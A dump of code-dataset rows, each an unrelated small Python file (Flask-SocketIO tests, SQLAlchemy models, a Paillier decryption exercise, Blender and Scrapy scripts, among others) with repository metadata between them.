# self.map = map
# def play(self):
# while True:
# # a = self.map.dict_locations
# print('yes')
thescenes = Scenes()
# thelocations = Locations()
# thedict = thelocations.map()
# while True:
# print("loop")
# thelocations.map.dict_locations.get('room1')
thescenes.start()
while True:
action = input("> ")
if action in thescenes.map_list:
print("success")
thescenes.map_list[action](thescenes)
| [
"ahivent@gmail.com"
] | ahivent@gmail.com |
e481fb804a420ea35504640c9219c0b0f7da94c0 | 2d8d8742bc510a1cf67f0e208568d63bcbf49d4f | /Prediction/bcd.py | 5cb39b996493324aac80a4e1091533c3f9e0321c | [] | no_license | abhikbhattacharjee/BE_Project | bb834a32229ac2f914921ec555084c689a9a90b8 | f6cf474266f74f5e362c3216c270ce35eb669d3c | refs/heads/master | 2023-08-21T21:36:26.798272 | 2021-09-26T10:47:02 | 2021-09-26T10:47:02 | 197,564,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 7 10:16:09 2019
@author: chinmay
"""
import pandas as pd
p_c=pd.read_excel("Peakcalling_1e-4__PePr_peaks_homer.xlsx", 'Peakcalling_1e-4__PePr_peaks_ho')
cols = [1,2,3]
df = p_c[p_c.columns[cols]]
#df=df.sample(n=258)
df.to_csv(path_or_buf="predict.tsv",sep='\t',index=False,header=False)
| [
"noreply@github.com"
] | abhikbhattacharjee.noreply@github.com |
2e7eeb1bbc26d482b08aabe4f0ca5824c1d7a472 | 02ffd6dfd5ef11027f9cd3b45f5ba48d5144747c | /7 Variable.py | f02bbf47fafe9dce47c8864c2a49d70a070ecb56 | [] | no_license | Zoran1024/tensorflow1.x- | 686f87962ab5c9a42ccc8d0898fc6e78399a6f52 | 9ce3808d0da7866967a6679f2564971ea1b8fb4f | refs/heads/master | 2022-12-06T16:44:21.881179 | 2020-08-12T09:16:47 | 2020-08-12T09:16:47 | 286,948,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import tensorflow as tf
state = tf.Variable(0,name='counter')
#print(state.name)
one = tf.constant(1)
new_value = tf.add(state,one)
update = tf.assign(state,new_value) # 将new_value加载到state上
init = tf.initialize_all_variables() # must have if define variable
with tf.Session() as sess:
sess.run(init)
for i in range(3):
sess.run(update)
print(sess.run(state)) | [
"528778310@qq.com"
] | 528778310@qq.com |
17f4605acddde5733e7845a54b2e7a72f439d2b9 | 58bca29946133281eca5bf1f255b10d497ae2f13 | /ros_ws/devel/lib/python3/dist-packages/moveit_msgs/msg/_MotionPlanDetailedResponse.py | 03fb12b54fc034126496a61dc263bcfe988e87c9 | [] | no_license | AlexanderVieira/robotics | d3656f72f0f375d0229bef923d15d6ffe3d8750f | 0c54b200ccbc702f807212cfe5c40b6ca865b16f | refs/heads/main | 2023-03-31T05:15:19.378479 | 2021-04-09T01:53:26 | 2021-04-09T01:53:26 | 355,740,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 112 | py | /home/ros_ws/devel/.private/moveit_msgs/lib/python3/dist-packages/moveit_msgs/msg/_MotionPlanDetailedResponse.py | [
"alexander.silva@al.infnet.edu.br"
] | alexander.silva@al.infnet.edu.br |
689746fc5657a327e7a2e445e3ab2ba17677361b | abdc6f531223fd0327bf2f5c5ea6168de9f77178 | /src/Main.py | 56c749b5a44e1e325fe98a7ef032eba61a4fbcfa | [] | no_license | camouflage/Database | 84ea4f38d5e14bed3c589b63e575be7c7d056f6b | 1541e5c0d1cf5d33545c1575e848fc3609012eab | refs/heads/master | 2020-12-24T16:59:10.180889 | 2015-06-24T07:37:17 | 2015-06-24T07:37:17 | 36,067,888 | 4 | 2 | null | 2015-06-24T03:51:13 | 2015-05-22T11:04:16 | Python | UTF-8 | Python | false | false | 733 | py | #coding=utf-8
import MySQLdb
import SharedVar
from Authentication import *
from AdminOperation import *
from EmpOperation import *
def main():
"""
main
"""
print "=========================================="
print "= 欢迎使用 HELEN 酒店管理系统 "
print "= "
print "= made by the authors "
print "=========================================="
authentication = Authentication()
SharedVar.init()
if authentication == 0:
pass
elif authentication == 1:
AdminOp()
elif authentication == 2:
EmpOp()
SharedVar.commit()
print SharedVar.UserId, SharedVar.RoomId, SharedVar.GId, SharedVar.ResId
if __name__ == "__main__":
main() | [
"363419254@qq.com"
] | 363419254@qq.com |
9768d6a3edff696c9dc4b9790ff908e5722ada1f | b93bda18f43bdf0cbd549ba1e74d7ffd59a4d3fe | /monsite/urls.py | 45e7dfc7b103471c2b27ff8eb462048d3a4ad302 | [] | no_license | marieaimee40/mon-nouveau-blog | e2efa0d6e4be31492c89ddbc5384cc073f72d977 | f4e6fdb7b5b98fc68d9ddc554b886fadcb8bbc2e | refs/heads/master | 2022-04-21T14:20:34.307569 | 2020-04-21T00:07:25 | 2020-04-21T00:07:25 | 257,427,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | """monsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
]
| [
"konemarieaimee@gmail.com"
] | konemarieaimee@gmail.com |
1ec17915e3f19972828f43dc0cadcc6cbec8c414 | cebe96ac3edbc4d47456a72c8af360170cc7d286 | /practice/Test_hw.py | d07721b7f68805aa5c2701b685eab68964e0fe2e | [] | no_license | fullerharrison/afs505_u1 | 5134b9454275d2fd7feeb15087f8d13e326a9286 | fb1c9f5cc3e0d5609ccab98c1f8f7ab6dbc00f50 | refs/heads/master | 2020-12-13T10:42:36.297124 | 2020-05-13T23:55:45 | 2020-05-13T23:55:45 | 234,392,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | statement = input()
if statement == "t":
print("Yes")
if input != "x":
print("Rubbish")
else:
pass
elif statement == "N":
print("No")
else:
print("What?")
| [
"harrison.fuller@wsu.edu"
] | harrison.fuller@wsu.edu |
05b6ac28c06c1faa07725f1786566eb5c14c622c | add4e82987a5e25cca6f2a33b6373bc7e13c9164 | /unittest_md.py | c824d22ec504b6852d1acc6c99ea77c03a2cdf25 | [] | no_license | rogerOncu/hands-on-3 | 35d214d55d1045cd07a8a94d5defe6cc083f4a2f | ebecd8954403197486b285c24d6e06b47bdd94df | refs/heads/main | 2022-12-27T02:54:46.594870 | 2020-10-05T13:48:20 | 2020-10-05T13:48:20 | 301,413,145 | 0 | 0 | null | 2020-10-05T13:48:21 | 2020-10-05T13:11:50 | Python | UTF-8 | Python | false | false | 796 | py | import sys, unittest
from md import calcenergy
from ase.lattice.cubic import FaceCenteredCubic
from ase.md.velocitydistribution import MaxwellBoltzmannDistribution
from ase.md.verlet import VelocityVerlet
from ase import units
from asap3 import EMT
class MdTests(unittest.TestCase):
def test_calcenergy(a):
size = 5
atoms = FaceCenteredCubic(directions=[[1, 0, 0], [0, 1, 0], [0, 0, 1]],
symbol="Cu",
size=(size, size, size),
pbc=True)
atoms.calc = EMT()
calcenergy(atoms)
if __name__ == '__main__':
tests = [unittest.TestLoader().loadTestsFromTestCase(MdTests)]
testsuite = unittest.TestSuite(tests)
result = unittest.TextTestRunner(verbosity=0).run(testsuite)
sys.exit(not result.wasSuccessful())
| [
""
] | |
cce07889dbbe1d3b324bd258d250530dddba9257 | 26fa881f2bc253cf4f44f48de534164052fd9509 | /server/tests/unit/test_sockets.py | 766f302984601bcc045161854b1134fb5ab4fb74 | [] | no_license | mmfrenkel/KERMit | 95d14e3cda5f423a0d5d7d9448c4d0d012e80866 | 54faa073a46099983a8b14ef03111d6a19fe0085 | refs/heads/main | 2023-01-29T16:31:03.332301 | 2020-12-10T22:29:37 | 2020-12-10T22:29:37 | 301,879,509 | 0 | 3 | null | 2020-12-08T18:11:04 | 2020-10-06T23:32:59 | Python | UTF-8 | Python | false | false | 12,665 | py | """
Unit tests for web socket functionality.
"""
import pytest
from backend import app, socketio
from backend.models.user import User
from backend.google_auth import GoogleAuth
from tests.unit.mocks import verification_token, mock_find_by_g_id,\
mock_no_puzzles_for_player, mock_single_puzzles_for_player, mock_get_puzzle
@pytest.fixture
def flask_client():
"""A test client to use for each test"""
return app.test_client()
def test_socketio_cannot_connect_without_credentials(flask_client):
"""
Test that it is not possible to connect without credentials.
"""
# connect to Socket.IO without being logged in
client = socketio.test_client(app, flask_test_client=flask_client)
assert not client.is_connected()
def test_socketio_cannot_connect_with_invalid_credentials(monkeypatch, flask_client):
"""
Test that it is not possible to establish socket connection without valid credential.
"""
# connect to Socket.IO without being logged in
def mock_verify_token(*args, **kwargs):
"""Mock the verification of the token fails."""
return {"error": "some error", "error_description": 'A bad error occurred'}
monkeypatch.setattr(GoogleAuth, "validate_token", mock_verify_token)
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
assert not client.is_connected()
def test_socketio_can_connect_with_valid_credentials(flask_client, verification_token):
"""
Test that it is not possible to connect without credentials.
"""
# connect to Socket.IO without being logged in
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
assert client.is_connected()
assert client.get_received() == []
def test_socketio_join_missing_token(flask_client, verification_token):
"""
Test attempt to join room, missing token.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'puzzle_id': 1})
assert client.get_received() == []
def test_socketio_join_missing_puzzle(flask_client, verification_token):
"""
Test attempt to join room, missing room id (i.e., puzzle id).
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X'})
assert client.get_received() == []
def test_socketio_join_bad_token(monkeypatch, flask_client, verification_token):
"""
Test attempt to join room, but uses a bad token.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
monkeypatch.setattr(GoogleAuth, "validate_token",
lambda x, y: {"error": "some error",
"error_description": 'A bad error occurred'})
client.emit('join', {'token': 'X', 'puzzle_id': 1})
assert client.get_received() == []
def test_socketio_join_user_doesnt_exist(monkeypatch, flask_client, verification_token):
"""
Test that if an attempt is made to join a room by an unregistered user,
the attempt fails.
"""
monkeypatch.setattr(User, 'find_by_g_id', lambda x: None)
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
assert client.get_received() == []
def test_socketio_join_puzzle_not_associated(flask_client, verification_token, mock_find_by_g_id,
mock_no_puzzles_for_player):
"""
Test attempt to join room, but the room that the player is attempt to join is
not associated with them yet; the attempt should fail.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
assert client.get_received() == []
def test_socketio_join_puzzle(flask_client, verification_token, mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test attempt to join room, information is correct.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
]
def test_socketio_disconnect(flask_client, verification_token):
"""
Test attempt disconnect websocket should be successful.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.disconnect()
assert not client.is_connected()
def test_socketio_handle_move_missing_puzzle_id(flask_client, verification_token):
"""
Test re-emit move alert to members of a room; current socket is not part of
the room.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('move', {'x_coordinate': 1, 'y_coordinate': 5})
assert client.get_received() == []
def test_socketio_handle_move_not_in_room(flask_client, verification_token, mock_get_puzzle):
"""
Test re-emit move alert to members of a room; current socket is not part of
the room.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('move', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
assert client.get_received() == []
def test_socketio_handle_move_in_room(flask_client, verification_token, mock_find_by_g_id,
mock_single_puzzles_for_player, mock_get_puzzle):
"""
Test re-emit move alert to members of a room; current socket is part of room.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('move', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
{'name': 'puzzle_update', 'args': [
{
'puzzle_id': None,
'completed': False,
'difficulty': 0.5,
'point_value': 90,
'pieces': [
{'x_coordinate': 0, 'y_coordinate': 1, 'static_piece': False, 'value': None},
{'x_coordinate': 1, 'y_coordinate': 1, 'static_piece': True, 'value': 3}
]
}
], 'namespace': '/'}]
def test_socketio_handle_message(flask_client, verification_token, mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test handle a message in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('message', {
'puzzle_id': 1, 'message': 'This is a message', 'email': 'exampleemail.com'
})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
{'name': 'message_update', 'args': [
{'puzzle_id': 1, 'message': 'This is a message', 'email': 'exampleemail.com'}
], 'namespace': '/'}
]
def test_socketio_handle_message_missing_puzzle_id(flask_client, verification_token,
mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test handle a message in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('message', {'message': 'This is a message', 'email': 'exampleemail.com'})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
]
def test_socketio_handle_add_lock(flask_client, verification_token, mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test handle re-emitting an addlock event in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('add_lock', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
{'name': 'lock_update_add', 'args': [
{'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5}
], 'namespace': '/'}
]
def test_socketio_handle_lock_missing_puzzle_id(flask_client, verification_token, mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test handle re-emitting an addlock event in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('add_lock', {'x_coordinate': 1, 'y_coordinate': 5})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
]
def test_socketio_handle_remove_lock(flask_client, verification_token, mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test handle re-emitting a remove lock event in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('remove_lock', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
{'name': 'lock_update_remove', 'args': [
{'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5}
], 'namespace': '/'}
]
def test_socketio_handle_remove_lock_missing_puzzle_id(flask_client, verification_token,
mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test handle re-emitting a remove lock event in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('remove_lock', {'x_coordinate': 1, 'y_coordinate': 5})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
]
def test_socketio_handle_leave(flask_client, verification_token, mock_find_by_g_id,
mock_single_puzzles_for_player):
"""
Test handle re-emitting a remove lock event in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('leave', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
]
def test_socketio_handle_leave_missing_puzzle_id(flask_client, verification_token,
mock_find_by_g_id, mock_single_puzzles_for_player):
"""
Test handle re-emitting a remove lock event in a room that the current websocket is in.
"""
client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
client.emit('join', {'token': 'X', 'puzzle_id': 1})
client.emit('leave', {'x_coordinate': 1, 'y_coordinate': 5})
recvd = client.get_received()
assert recvd == [
{'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
]
| [
"noreply@github.com"
] | mmfrenkel.noreply@github.com |
9ca1517fe735fd7212f2b5e8eb0ea730c6e464b8 | 6c0886e0b732ebbc5ea31b545b309639aacbcd97 | /HA3/C1.py | e1e97c9c07fe1a60088ce3c77d843a31f481dc53 | [] | no_license | VictorWinberg/fjuo52 | 05614dfa174e3d233878e2c66932a9308505fc25 | fa37579ed49af6f5a80b0c88123c82fb48f2c2bc | refs/heads/master | 2021-05-07T21:11:07.951396 | 2018-03-01T08:34:46 | 2018-03-01T08:34:46 | 108,995,869 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,243 | py | from functools import reduce
from sys import argv
def mul_sum(array, n):
return reduce(lambda x, y: x * y % n, array)
def get_n(p, q):
return p * q
def totient(p, q):
return (p - 1) * (q - 1)
# (a * a_inv) == 1 (mod n) => a_inv = modinv(a) (mod n)
def modinv(a, n):
g, x, _ = euc_algorithm(a, n)
if g == 1:
return x % n
def euc_algorithm(a, n):
x0, x1, y0, y1 = 1, 0, 0, 1
while n != 0:
q, a, n = a // n, n, a % n
x0, x1 = x1, x0 - q * x1
y0, y1 = y1, y0 - q * y1
return a, x0, y0
def L(x, n):
return (x - 1) / n
def micro(g, _lambda, n):
return modinv(L(pow(g, _lambda, n**2), n), n)
def decrypt(c, _lambda, _micro, n):
return L(pow(c, _lambda, n**2), n) * _micro % n
if __name__ == "__main__":
p, q, g = [int(input().split('=')[1]) for i in range(3)]
# Compute n and totient
n = get_n(p, q)
_lambda = totient(p, q)
# Modular multiplication inverse
_micro = micro(g, _lambda, n)
if len(argv) < 2: raise Exception("Please specify an input file")
filepath = argv[1]
c_input = list(map(int, open(filepath).read().splitlines()))
c = mul_sum(c_input, n ** 2)
v = int(decrypt(c, _lambda, _micro, n))
print(v, v - n)
if v > len(c_input):
v -= n
print(v, 'mod', n)
| [
"dat14vwi@student.lu.se"
] | dat14vwi@student.lu.se |
0b2ec5a68840470333a9e9bad40c105a3a40b7a5 | 8254a350a45a2b9e9469101f247b5a1bab41a0d3 | /hairgen.py | 44923358eceea48c16f91ac1e64f79676d2abe28 | [] | no_license | zhexxian/Hairy-3D-Printing | 5d78e09ceaea5868ceb5dfad2f3071e96d6aaae2 | 22f471a314604876e75e518359eb5ab22f6142ab | refs/heads/master | 2021-01-01T15:23:29.635620 | 2017-07-27T15:45:38 | 2017-07-27T15:45:38 | 97,610,361 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | import bpy
object = bpy.context.object
object_radius = 0.5 * max(object.bound_box.data.dimensions.x, object.bound_box.data.dimensions.y)
bpy.ops.object.particle_system_add()
bpy.data.particles["ParticleSettings"].type = 'HAIR'
bpy.data.particles["ParticleSettings"].count = 3000
bpy.data.particles["ParticleSettings"].hair_length = object_radius
bpy.ops.object.modifier_convert(modifier="ParticleSystem 1")
bpy.ops.object.convert(target='CURVE')
bpy.context.object.data.fill_mode = 'FULL'
bpy.context.object.data.bevel_depth = 0.05
bpy.ops.object.convert(target='MESH')
| [
"shunyutan@hotmail.com"
] | shunyutan@hotmail.com |
079a78638966c854c7a692303e50cb2a90e5ee38 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02847/s323542817.py | e4b56ed542d286d18994ff8e3ae443092f5f3288 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | from sys import stdin, setrecursionlimit
WEEK = {
'SUN': 0,
'MON': 1,
'TUE': 2,
'WED': 3,
'THU': 4,
'FRI': 5,
'SAT': 6
}
def main():
input = stdin.buffer.readline
s = input()[:-1].decode()
print(7 - WEEK[s])
if __name__ == "__main__":
setrecursionlimit(10000)
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
ce296890810f5eea7f7228c73a9c33edeabfaad3 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_465.py | e154871c10ca2a59b29c8328d23975e31a1fcf9d | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | # how to avoid hard-coding urls in webapp templates
url
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
b1f57009af00762a242e004c6e7fdbf9f617c947 | a9dccb9ebbfd482729663d4cae6f074d8bd44c2d | /TP5/EJ2.py | 30f8929b44561c83a89efc434b78e1a9d20cad12 | [] | no_license | FMachiavello/tp-python | 90ce840a3d9e7edf1033480146b5781da1b86f0c | e1ba1fe52242df50d42cf17d136d1b137bea469d | refs/heads/master | 2022-12-09T00:10:09.476003 | 2019-06-07T03:10:43 | 2019-06-07T03:10:43 | 294,257,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | def contDeLetras(cadena):
"""Determina si en la cadena ingresada hay mas letras 'A' o letras 'B'"""
if type(cadena) not in [str]:
raise TypeError("Ingrese una cadena valida")
cadena = cadena.casefold()
l1 = cadena.count("a")
l2 = cadena.count("á")
l3 = cadena.count("e")
l4 = cadena.count("é")
letraA = l1 + l2
letraB = l3 + l4
if cadena == "":
print("No se ha ingresado ninguna cadena")
return("")
elif letraA == 0 and letraB == 0:
print("No se ha ingresado ninguna letra 'A' ni 'E'")
return("Nada")
elif letraA == letraB:
print("La cadena tiene la misma cantidad de letras 'A' y 'E'")
return("Igual")
elif letraA > letraB:
print("La cadena tiene más letras 'A' que 'E'")
return("A")
else:
print("La cadena tiene más letras 'E' que 'A'")
return("E")
| [
"valiktroi16@gmail.com"
] | valiktroi16@gmail.com |
e8390081053f84852515f18c5edfb636621d94b6 | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /dp/dp_d/12309481.py | 505ec598e3b892ba10e55f5a4b003c8f412ac4cc | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | def main():
N, W = map(int, input().split())
wv = [tuple(map(int, input().split())) for i in range(N)]
dp = [-1]*(W+1)
dp[0] = 0
for w, v in wv:
for j in range(W-1, -1, -1):
if dp[j] >= 0 and j+w <= W:
dp[j+w] = max(dp[j+w], dp[j] + v)
print(max(dp))
main()
| [
"kouhei.k.0116@gmail.com"
] | kouhei.k.0116@gmail.com |
469e35add0a86c5c3185a155ac831b9ec771d346 | 3d1ac9d26cad86054154b2eddff870edf31aa70f | /credits/admin.py | ae667a26f659fe19d99a7c71d0848cb82f31b649 | [] | no_license | ASquirrelsTail/issue-tracker | a26f1035d73f41be7a62d048b21737b3d449adaf | 089126403f135631b72f5a66adb1a219ff7a9fc7 | refs/heads/master | 2022-12-18T19:55:37.420616 | 2019-11-17T19:45:26 | 2019-11-17T19:45:26 | 202,887,245 | 0 | 1 | null | 2022-12-08T06:08:24 | 2019-08-17T13:55:24 | JavaScript | UTF-8 | Python | false | false | 565 | py | from django.contrib import admin
from credits.models import Wallet, Credit, Debit
# Register your models here.
class DebitAdmin(admin.TabularInline):
model = Debit
readonly_fields = ('wallet', 'created', 'amount',)
class CreditAdmin(admin.TabularInline):
model = Credit
readonly_fields = ('wallet', 'created', 'amount', 'real_value', 'stripe_transaction_id',)
class WalletAdmin(admin.ModelAdmin):
model = Wallet
readonly_fields = ('user', 'balance',)
inlines = (DebitAdmin, CreditAdmin)
admin.site.register(Wallet, WalletAdmin)
| [
"rjtwilton@hotmail.com"
] | rjtwilton@hotmail.com |
88d557e6724162366d68b42f9f4abee826fff315 | 6f62d7de4294271fd2648d363f7719b9d8a45b5e | /models.py | 6af57efba03243817d026c96c5d2ae3f954be3f8 | [] | no_license | JosephHaowen/projectInterview | 3424bb3817564031a35f3c7d80b47d01ed8be863 | 13513c697cd269a54ff918fcb6a0fffb5085e7e1 | refs/heads/master | 2020-12-24T21:01:42.624111 | 2016-05-06T02:02:05 | 2016-05-06T02:02:05 | 56,777,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,785 | py | from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.ext.declarative import declarative_base
from database import engine, Base
def loadSession():
metadata = Base.metadata
Session = sessionmaker(bind=engine)
session = Session()
return session
class Degrees(Base):
__tablename__ = 'cb_degrees'
__table_args__ = {'autoload': True}
class FundingRounds(Base):
__tablename__ = 'cb_funding_rounds'
__table_args__ = {'autoload': True}
class People(Base):
__tablename__ = 'cb_people'
__table_args__ = {'autoload': True}
class Objects(Base):
__tablename__ = 'cb_objects'
__table_args__ = {'autoload': True}
class Investments(Base):
__tablename__ = 'cb_investments'
__table_args__ = {'autoload': True}
#class Growth(FundingRounds):
#class InvestedCompany(Base):
#__tablename__ = 'employee'
#id = Column(Integer, primary_key=True)
#name = Column(String)
#investor_id = column(String, ForeignKey('cb_investments.investor_id'))
# Use default=func.now() to set the default hiring time
# of an Employee to be the current time when an
# Employee record was created
# Use cascade='delete,all' to propagate the deletion of a Department onto its Employees
#investor = relation(
# Investments,
# backref=backref('',
# uselist=True,
# cascade='delete,all'))
meta = MetaData()
meta.reflect(bind = engine)
objects_table = meta.tables['cb_objects']
investment_table = meta.tables['cb_investments']
people_table = meta.tables['cb_people']
degrees_table = meta.tables['cb_degrees']
def queryRoundCollege(fundingRound):
session = loadSession()
res = session.query(Degrees).join(People, Degrees.object_id == People.object_id). \
join(Objects, Objects.name == People.affiliation_name). \
join(FundingRounds, FundingRounds.object_id == Objects.id). \
filter(FundingRounds.funding_round_type == fundingRound).distinct()
return res
def queryInvestorCompany(college):
session = loadSession()
res1 = session.query(Objects).join(People, People.affiliation_name == Objects.name).\
join(Degrees, Degrees.object_id == People.object_id).\
filter(Degrees.institution == college).subquery()
res2 = session.query(Investments).join(Degrees, Degrees.object_id == Investments.investor_object_id).\
filter(Degrees.institution == college).subquery()
res3 = session.query(Objects).join(res1, res1.c.id == Objects.id).join(res2, res2.c.funded_object_id == res1.c.id)
return res3
#return session.query(InvestedCompany).from_statement(res5)
if __name__ == '__main__':
res = queryRoundCollege("series-b")
#session = loadSession()
print res[0].id | [
"ht398@cornell.edu"
] | ht398@cornell.edu |
450a62527548570c20fc470b499265a82fc790e0 | 987e54f6da76b24fca9cb478affeb03fe10e2dae | /download_images/pipelines.py | 4b0b15e6a9398493adbec883539c00fa70731f86 | [] | no_license | amansinghal123/web-scraping-project | c4cc8a2196b724c032a7c87e82f5ab0e0aaae3b1 | c1120eec8529b7745bff7bf234c00fe00f909d30 | refs/heads/master | 2022-04-26T08:40:38.183191 | 2020-05-04T14:35:33 | 2020-05-04T14:35:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
class DownloadImagesPipeline:
def process_item(self, item, spider):
return item
| [
"noreply@github.com"
] | amansinghal123.noreply@github.com |
